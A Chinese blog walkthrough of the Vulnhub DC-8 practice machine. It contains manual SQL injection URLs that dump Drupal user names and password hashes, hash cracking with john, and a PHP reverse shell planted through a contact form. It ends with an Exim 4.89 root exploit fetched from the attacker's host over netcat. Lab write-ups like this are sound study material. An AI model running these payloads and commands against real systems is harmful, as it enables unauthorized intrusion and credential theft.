Vulnhub-DC-8

最新推荐文章于 2024-01-14 22:22:59 发布
最新推荐文章于 2024-01-14 22:22:59 发布
阅读量354 收藏
点赞数
分类专栏: Vulnhub
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107120658
版权

首先用 namp 扫描,获取目标 IP 地址:nmap -sn 192.168.67.0/24

74d63a84587ec54a3ac3a87b8f31176.png

其次再用 nmap 扫描下目标端口:nmap -A -p- 192.168.67.52/24

ebe78043e124dcba15244cc185b8144.png

看来开放了 80 和 22 端口,上去网页浏览下:
8e35e8d7d0887c530a4a944e61867be.png

点开各个页面看看,可以发现有些 URL 地址栏会变,在这里补充个知识 Drupal 的 id 名称为 node id 简称 nid,这里因为显示 2 3 node 所以想着会不会有 SQL 注入:
d388cfc614aa1fea96767deb32b9b35.png

尝试加个单引号,就会产生报错信息,这在 Sqlilabs 上面训练的很多了,我们就知道这有注入
http://192.168.67.52/node/?nid=1%27

1d0f31bfb736057d170d2d48a72e879.png

通过报错,我们可以看到后台 SQL 语句为:
SELECT title FROM node WHERE nid = 1;

下面是手工注入的过程:
http://192.168.67.52/node/?nid=1%27%23
http://192.168.67.52/node/?nid=1 order by 2–报错
http://192.168.67.52/node/?nid=-1 union select 1
e3a8403ccb0b3707945a558980fb131.png

爆表名:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(table_name) from information_schema.tables where table_schema=database())

3c31dc4fb1516305e021b13505bec37.png

爆列名:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')

37d7cc8f6298e442277377425674097.png

爆数据:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(name) from users)
http://192.168.67.52/node/?nid=-1 union select (select group_concat(pass) from users)
6b4e6df247ae6e401303998b1c685f9.png
a14b10727ae16a225befd69b12c56e2.png

kali 字典跑一下这两个用户:
把密码存放到 pwd.txt
john pwd.txt
john --show pwd.txt
得到密码:turtle

http://192.168.67.52/robots.txt 查看一下有什么页面,利用刚刚得到的用户名和密码登陆:
http://192.168.67.52/user/login/
可以在这个页面下看到可以上传 php code,这里需要在前面随便加一点东西,否则不会生效:D原因尚不明

7fb69eb91db4f0f382c1ab44e99c1ba.png

保存后,我们提交评论上去,并且 kali 做好侦听的准备:
webshell可选:/usr/share/webshells/php/php-reverse-shell.php
也可以 weevely 构造:|
6ede122413af9eecc54b7130d646a2f.png

提交即可获取 shell:
b4bcff3f8c5d27abe101bccc048c2a7.png
ls -l /home
ls -l /home/dc8user 没有发现
b964860def883923b546c554caaf337.png

看看有无可疑提权的…
find -perm -4000
f950c529aa0bd30a4c5a639c6edb608.png

看到 exim 没有,有没有一种熟悉的感觉?前几关我们利用过呢~
先查看一下当前 exim 的版本:(man exim 查看文档)
exim --version
079dad52663230f3eca831df45a6589.png

4.89,前面几关不都是 4.89 吗?
a24c1da7af504fc36a900251cd12cb7.png

话不多说,传 poc:
kali 这边:
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/k.sh
gedit k.sh查看下用法
有两个参数,一个事 -m setuid || 另外一个是 -m netcat,一般第一个的利用都不成功的,直接试 netcat 先
这里还需要防止格式错误:
vim k.sh
set ff=unix
Esc+:+wq
nc -vnlp 6767 < k.sh

/bin/bash这边:
cd /tmp
nc 192.168.67.221 6767 > k.sh
chmod +x k.sh
bash k.sh -m netcat
90ff8de3b27df73df70bf78c6e7a84f.png
7b3c837e28ffc3eeb28353baab5144c.png

一口气,爽爆了

总结:
1.SQL 注入2.对常见的CMS要深入了解3.细心观察4.linux 提权

CrAcKeR-1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2345
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
VulnHubDC-8
weixin_39219503的博客
02-02 403
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-8,367/ 题目信息如下 DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challeng...
vulnhub靶场之DC-8
qq_58091216的博客
01-14 1023
我们查看node,我们可以看到3行蓝色的字,我们一个一个进行访问,最后发现这里就只加了参数nid,非常可疑,可能存在有SQL注入、xss等漏洞。将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码。我们可以看到name和pass,我们想到前面的登录页面,我们进行爆破即可。我们可以看到报错了,可能存在报错注入,我们使用sqlmap进行测试。我们看到2个用户名和密码,但是密码是加密的,我们进行解密。
基于vulnhub靶场的DC8的通关流程 (个人记录)
qq_57774303的博客
12-29 421
用常用的工具nmap扫描192.168.52.142,观察其开放的端口号。我们发现这里可以发现能够上传文本,我们可以使用脚本来反射webshell。明明操作的都没问题,不知道跑为什么一直连接不上,所以我们换一种用法。发现问好后面的数字会随着点击东西的不同而进行变化。扫描出来的账户名是admin 密码是经过加密的。我们现在用MSF去链接paylopad的链接。扫出来的东西,你瞧见每,发现有user的表。可以尝试我们用之前得到的密码和账号进行登陆。我们用sqlmap扫描扫出来的数据库。
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2044
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
靶机渗透-Vulnhub-DC-8
dahege666的博客
03-10 183
下载地址: 1、 链接:https://pan.baidu.com/s/1B1QmTfu2vPswCOiCaf8Fmw 提取码:95i0 2、http://www.five86.com/downloads/DC-8.zip 3、https://download.vulnhub.com/dc/DC-8.zip 靶机:DC8(VMware桥接) IP:192.168.10.92 攻击机:Kali(VMware桥接) IP:192.168..10.91 1、确认目标IP先进行...
VulnHubDC-4
weixin_39219503的博客
01-31 249
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下,只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2976
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2206
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
vulnhub-DC8靶机实验
m0_64118193的博客
12-04 207
DC6靶机IP地址: 192.168.18.128 kali攻击机IP地址:192.168.18.101 开放端口,,我们进行网站登陆 观察URL,可能存在 手工注入参考链接 DC8 靶场手工注入SQL目录扫描 用户登陆地址 数据爆破 用户名 密码进行登陆 点击->点击->点击->点击->点击下拉框选择 搜索相关漏洞 传输
Vulnhub DC-8
Pai_Space
04-05 1005
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
Vulnhub靶机实战——DC-8
冠霖L的博客
10-30 3385
靶机DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Kali的IP地址:192.168.220.155 DC-8靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ...
Vulnhub-djinn3
KAKA的博客
07-18 1110
与 1 和 2 相同,开机即可得到 djinn3 的 IP地址:192.168.67.14 获取相关信息:nmap -A -p- 192.168.67.14 22 ---> ssh --> open 80 ---> http --> open 5000 ---> http --> open 31337 ---> open --> open 探测 80 端口 先看看刚刚 nmap 有没有扫出什么东西: 可得到服务端是 lighttp.
2014年电源网年会-沙德尚-高频隔离软开关DC-DC变换器
06-30
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值